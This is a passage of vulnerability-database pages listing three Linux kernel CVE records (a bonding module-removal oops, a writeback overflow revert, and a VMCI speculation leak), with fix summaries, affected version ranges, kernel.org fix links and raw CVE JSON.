    "dateUpdated": "2026-01-05T10:37:02.905Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39296 (GCVE-0-2024-39296)

Vulnerability from cvelistv5 – Published: 2024-06-25 14:22 – Updated: 2025-05-04 09:16

Title

bonding: fix oops during rmmod

Summary

In the Linux kernel, the following vulnerability has been resolved: bonding: fix oops during rmmod "rmmod bonding" causes an oops ever since commit cc317ea3d927 ("bonding: remove redundant NULL check in debugfs function"). Here are the relevant functions being called: bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root); bonding_debug_root = NULL; <--------- SET TO NULL HERE bond_netlink_fini() rtnl_link_unregister() __rtnl_link_unregister() unregister_netdevice_many_notify() bond_uninit() bond_debug_unregister() (commit removed check for bonding_debug_root == NULL) debugfs_remove() simple_recursive_removal() down_write() -> OOPS However, reverting the bad commit does not solve the problem completely because the original code contains a race that could cause the same oops, although it was much less likely to be triggered unintentionally: CPU1 rmmod bonding bonding_exit() bond_destroy_debugfs() debugfs_remove_recursive(bonding_debug_root); CPU2 echo -bond0 > /sys/class/net/bonding_masters bond_uninit() bond_debug_unregister() if (!bonding_debug_root) CPU1 bonding_debug_root = NULL; So do NOT revert the bad commit (since the removed checks were racy anyway), and instead change the order of actions taken during module removal. The same oops can also happen if there is an error during module init, so apply the same fix there.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f07224c16678a8af5…
	https://git.kernel.org/stable/c/cf48aee81103ca06d…
	https://git.kernel.org/stable/c/a45835a0bb6ef7d5d…

Impacted products

Vendor

Product

Version

Linux

Affected: cc317ea3d9272fab4f6fef527c865f30ca479394 , < f07224c16678a8af54ddc059b3d2d51885d7f35e (git)
Affected: cc317ea3d9272fab4f6fef527c865f30ca479394 , < cf48aee81103ca06d09d73d33fb72f1191069aa6 (git)
Affected: cc317ea3d9272fab4f6fef527c865f30ca479394 , < a45835a0bb6ef7d5ddbc0714dd760de979cb6ece (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39296",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-25T20:46:46.560534Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-25T20:46:55.199Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:19:20.715Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f07224c16678a8af54ddc059b3d2d51885d7f35e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf48aee81103ca06d09d73d33fb72f1191069aa6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a45835a0bb6ef7d5ddbc0714dd760de979cb6ece"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f07224c16678a8af54ddc059b3d2d51885d7f35e",
              "status": "affected",
              "version": "cc317ea3d9272fab4f6fef527c865f30ca479394",
              "versionType": "git"
            },
            {
              "lessThan": "cf48aee81103ca06d09d73d33fb72f1191069aa6",
              "status": "affected",
              "version": "cc317ea3d9272fab4f6fef527c865f30ca479394",
              "versionType": "git"
            },
            {
              "lessThan": "a45835a0bb6ef7d5ddbc0714dd760de979cb6ece",
              "status": "affected",
              "version": "cc317ea3d9272fab4f6fef527c865f30ca479394",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: fix oops during rmmod\n\n\"rmmod bonding\" causes an oops ever since commit cc317ea3d927 (\"bonding:\nremove redundant NULL check in debugfs function\").  Here are the relevant\nfunctions being called:\n\nbonding_exit()\n  bond_destroy_debugfs()\n    debugfs_remove_recursive(bonding_debug_root);\n    bonding_debug_root = NULL; \u003c--------- SET TO NULL HERE\n  bond_netlink_fini()\n    rtnl_link_unregister()\n      __rtnl_link_unregister()\n        unregister_netdevice_many_notify()\n          bond_uninit()\n            bond_debug_unregister()\n              (commit removed check for bonding_debug_root == NULL)\n              debugfs_remove()\n              simple_recursive_removal()\n                down_write() -\u003e OOPS\n\nHowever, reverting the bad commit does not solve the problem completely\nbecause the original code contains a race that could cause the same\noops, although it was much less likely to be triggered unintentionally:\n\nCPU1\n  rmmod bonding\n    bonding_exit()\n      bond_destroy_debugfs()\n        debugfs_remove_recursive(bonding_debug_root);\n\nCPU2\n  echo -bond0 \u003e /sys/class/net/bonding_masters\n    bond_uninit()\n      bond_debug_unregister()\n        if (!bonding_debug_root)\n\nCPU1\n        bonding_debug_root = NULL;\n\nSo do NOT revert the bad commit (since the removed checks were racy\nanyway), and instead change the order of actions taken during module\nremoval.  The same oops can also happen if there is an error during\nmodule init, so apply the same fix there."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:14.106Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f07224c16678a8af54ddc059b3d2d51885d7f35e"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf48aee81103ca06d09d73d33fb72f1191069aa6"
        },
        {
          "url": "https://git.kernel.org/stable/c/a45835a0bb6ef7d5ddbc0714dd760de979cb6ece"
        }
      ],
      "title": "bonding: fix oops during rmmod",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39296",
    "datePublished": "2024-06-25T14:22:40.218Z",
    "dateReserved": "2024-06-24T13:54:11.074Z",
    "dateUpdated": "2025-05-04T09:16:14.106Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42102 (GCVE-0-2024-42102)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:45 – Updated: 2025-11-03 22:01

Title

Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again"

Summary

In the Linux kernel, the following vulnerability has been resolved: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" Patch series "mm: Avoid possible overflows in dirty throttling". Dirty throttling logic assumes dirty limits in page units fit into 32-bits. This patch series makes sure this is true (see patch 2/2 for more details). This patch (of 2): This reverts commit 9319b647902cbd5cc884ac08a8a6d54ce111fc78. The commit is broken in several ways. Firstly, the removed (u64) cast from the multiplication will introduce a multiplication overflow on 32-bit archs if wb_thresh * bg_thresh >= 1<<32 (which is actually common - the default settings with 4GB of RAM will trigger this). Secondly, the div64_u64() is unnecessarily expensive on 32-bit archs. We have div64_ul() in case we want to be safe & cheap. Thirdly, if dirty thresholds are larger than 1<<32 pages, then dirty balancing is going to blow up in many other spectacular ways anyway so trying to fix one possible overflow is just moot.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/253f9ea7e8e53a517…
	https://git.kernel.org/stable/c/23a28f5f3f6ca1e41…
	https://git.kernel.org/stable/c/145faa3d03688cbb7…
	https://git.kernel.org/stable/c/2820005edae13b140…
	https://git.kernel.org/stable/c/cbbe17a324437c0ff…
	https://git.kernel.org/stable/c/f6620df12cb6bdcad…
	https://git.kernel.org/stable/c/000099d71648504fb…
	https://git.kernel.org/stable/c/30139c702048f1097…

Impacted products

Vendor

Product

Version

Linux

Affected: c593d26fb5d577ef31b6e49a31e08ae3ebc1bc1e , < 253f9ea7e8e53a5176bd80ceb174907b10724c1a (git)
Affected: 1f12e4b3284d6c863f272eb2de0d4248ed211cf4 , < 23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807 (git)
Affected: 81e7d2530d458548b90a5c5e76b77ad5e5d1c0df , < 145faa3d03688cbb7bbaaecbd84c01539852942c (git)
Affected: 5099871b370335809c0fd1abad74d9c7c205d43f , < 2820005edae13b140f2d54267d1bd6bb23915f59 (git)
Affected: 16b1025eaa8fc223ab4273ece20d1c3a4211a95d , < cbbe17a324437c0ff99881a3ee453da45b228a00 (git)
Affected: ec18ec230301583395576915d274b407743d8f6c , < f6620df12cb6bdcad671d269debbb23573502f9d (git)
Affected: 9319b647902cbd5cc884ac08a8a6d54ce111fc78 , < 000099d71648504fb9c7a4616f92c2b70c3e44ec (git)
Affected: 9319b647902cbd5cc884ac08a8a6d54ce111fc78 , < 30139c702048f1097342a31302cbd3d478f50c63 (git)
Affected: 65977bed167a92e87085e757fffa5798f7314c9f (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:36.684Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/253f9ea7e8e53a5176bd80ceb174907b10724c1a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/145faa3d03688cbb7bbaaecbd84c01539852942c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2820005edae13b140f2d54267d1bd6bb23915f59"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbbe17a324437c0ff99881a3ee453da45b228a00"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f6620df12cb6bdcad671d269debbb23573502f9d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/000099d71648504fb9c7a4616f92c2b70c3e44ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/30139c702048f1097342a31302cbd3d478f50c63"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42102",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:59.274407Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:59.444Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "253f9ea7e8e53a5176bd80ceb174907b10724c1a",
              "status": "affected",
              "version": "c593d26fb5d577ef31b6e49a31e08ae3ebc1bc1e",
              "versionType": "git"
            },
            {
              "lessThan": "23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807",
              "status": "affected",
              "version": "1f12e4b3284d6c863f272eb2de0d4248ed211cf4",
              "versionType": "git"
            },
            {
              "lessThan": "145faa3d03688cbb7bbaaecbd84c01539852942c",
              "status": "affected",
              "version": "81e7d2530d458548b90a5c5e76b77ad5e5d1c0df",
              "versionType": "git"
            },
            {
              "lessThan": "2820005edae13b140f2d54267d1bd6bb23915f59",
              "status": "affected",
              "version": "5099871b370335809c0fd1abad74d9c7c205d43f",
              "versionType": "git"
            },
            {
              "lessThan": "cbbe17a324437c0ff99881a3ee453da45b228a00",
              "status": "affected",
              "version": "16b1025eaa8fc223ab4273ece20d1c3a4211a95d",
              "versionType": "git"
            },
            {
              "lessThan": "f6620df12cb6bdcad671d269debbb23573502f9d",
              "status": "affected",
              "version": "ec18ec230301583395576915d274b407743d8f6c",
              "versionType": "git"
            },
            {
              "lessThan": "000099d71648504fb9c7a4616f92c2b70c3e44ec",
              "status": "affected",
              "version": "9319b647902cbd5cc884ac08a8a6d54ce111fc78",
              "versionType": "git"
            },
            {
              "lessThan": "30139c702048f1097342a31302cbd3d478f50c63",
              "status": "affected",
              "version": "9319b647902cbd5cc884ac08a8a6d54ce111fc78",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "65977bed167a92e87085e757fffa5798f7314c9f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "mm/page-writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.19.307",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "5.4.269",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.210",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.149",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1.79",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again\"\n\nPatch series \"mm: Avoid possible overflows in dirty throttling\".\n\nDirty throttling logic assumes dirty limits in page units fit into\n32-bits.  This patch series makes sure this is true (see patch 2/2 for\nmore details).\n\n\nThis patch (of 2):\n\nThis reverts commit 9319b647902cbd5cc884ac08a8a6d54ce111fc78.\n\nThe commit is broken in several ways.  Firstly, the removed (u64) cast\nfrom the multiplication will introduce a multiplication overflow on 32-bit\narchs if wb_thresh * bg_thresh \u003e= 1\u003c\u003c32 (which is actually common - the\ndefault settings with 4GB of RAM will trigger this).  Secondly, the\ndiv64_u64() is unnecessarily expensive on 32-bit archs.  We have\ndiv64_ul() in case we want to be safe \u0026 cheap.  Thirdly, if dirty\nthresholds are larger than 1\u003c\u003c32 pages, then dirty balancing is going to\nblow up in many other spectacular ways anyway so trying to fix one\npossible overflow is just moot."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:37.713Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/253f9ea7e8e53a5176bd80ceb174907b10724c1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/23a28f5f3f6ca1e4184bd0e9631cd0944cf1c807"
        },
        {
          "url": "https://git.kernel.org/stable/c/145faa3d03688cbb7bbaaecbd84c01539852942c"
        },
        {
          "url": "https://git.kernel.org/stable/c/2820005edae13b140f2d54267d1bd6bb23915f59"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbbe17a324437c0ff99881a3ee453da45b228a00"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6620df12cb6bdcad671d269debbb23573502f9d"
        },
        {
          "url": "https://git.kernel.org/stable/c/000099d71648504fb9c7a4616f92c2b70c3e44ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/30139c702048f1097342a31302cbd3d478f50c63"
        }
      ],
      "title": "Revert \"mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again\"",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42102",
    "datePublished": "2024-07-30T07:45:58.423Z",
    "dateReserved": "2024-07-29T15:50:41.174Z",
    "dateUpdated": "2025-11-03T22:01:36.684Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39499 (GCVE-0-2024-39499)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2025-11-03 21:56

Title

vmci: prevent speculation leaks by sanitizing event in event_deliver()

Summary

In the Linux kernel, the following vulnerability has been resolved: vmci: prevent speculation leaks by sanitizing event in event_deliver() Coverity spotted that event_msg is controlled by user-space, event_msg->event_data.event is passed to event_deliver() and used as an index without sanitization. This change ensures that the event index is sanitized to mitigate any possibility of speculative information leaks. This bug was discovered and resolved using Coverity Static Analysis Security Testing (SAST) by Synopsys, Inc. Only compile tested, no access to HW.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/58730dfbd4ae01c1b…
	https://git.kernel.org/stable/c/681967c4ff210e063…
	https://git.kernel.org/stable/c/f70ff737346744633…
	https://git.kernel.org/stable/c/95ac3e773a1f8da83…
	https://git.kernel.org/stable/c/95bac1c8bedb36237…
	https://git.kernel.org/stable/c/e293c6b38ac9029d7…
	https://git.kernel.org/stable/c/757804e1c599af5d2…
	https://git.kernel.org/stable/c/8003f00d895310d40…

Impacted products

Vendor

Product

Version

Linux

Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 58730dfbd4ae01c1b022b0d234a8bf8c02cdfb81 (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 681967c4ff210e06380acf9b9a1b33ae06e77cbd (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < f70ff737346744633e7b655c1fb23e1578491ff3 (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 95ac3e773a1f8da83c4710a720fbfe80055aafae (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 95bac1c8bedb362374ea1937b1d3e833e01174ee (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < e293c6b38ac9029d76ff0d2a6b2d74131709a9a8 (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 757804e1c599af5d2a7f864c8e8b2842406ff4bb (git)
Affected: 1d990201f9bb499b7c76ab00abeb7e803c0bcb2a , < 8003f00d895310d409b2bf9ef907c56b42a4e0f4 (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:17.161Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/58730dfbd4ae01c1b022b0d234a8bf8c02cdfb81"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/681967c4ff210e06380acf9b9a1b33ae06e77cbd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f70ff737346744633e7b655c1fb23e1578491ff3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95ac3e773a1f8da83c4710a720fbfe80055aafae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95bac1c8bedb362374ea1937b1d3e833e01174ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e293c6b38ac9029d76ff0d2a6b2d74131709a9a8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/757804e1c599af5d2a7f864c8e8b2842406ff4bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8003f00d895310d409b2bf9ef907c56b42a4e0f4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39499",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:16.825229Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:40.701Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "58730dfbd4ae01c1b022b0d234a8bf8c02cdfb81",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "681967c4ff210e06380acf9b9a1b33ae06e77cbd",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "f70ff737346744633e7b655c1fb23e1578491ff3",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "95ac3e773a1f8da83c4710a720fbfe80055aafae",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "95bac1c8bedb362374ea1937b1d3e833e01174ee",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "e293c6b38ac9029d76ff0d2a6b2d74131709a9a8",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "757804e1c599af5d2a7f864c8e8b2842406ff4bb",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            },
            {
              "lessThan": "8003f00d895310d409b2bf9ef907c56b42a4e0f4",
              "status": "affected",
              "version": "1d990201f9bb499b7c76ab00abeb7e803c0bcb2a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
